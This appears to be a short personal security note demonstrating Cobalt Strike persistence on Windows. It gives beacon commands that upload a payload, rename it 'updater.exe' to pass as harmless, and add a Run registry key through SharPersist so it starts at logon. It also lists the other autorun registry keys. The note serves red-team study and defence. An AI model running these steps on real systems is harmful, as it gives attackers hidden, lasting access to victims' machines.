Cobalt Strike persistence through registry autorun

Demonstration

beacon> cd C:\ProgramData
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe updater.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

where:

-k is the registry key to modify.
-v is the name of the registry key to create.

Other Potential Registry Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Note: HKLM autorun keys are not executed as SYSTEM. These autorun keys will run when a user log in and under that user’s context.

Also see Privilege Escalation with Autoruns - HackTricks

Security Memo

Recent Notes

SMART

Bossa Nova

ZFS

post-rock

2024-09-27

Cobalt Strike persistence through registry autorun

Demonstration

Other Potential Registry Keys

Graph View

Table of Contents

Backlinks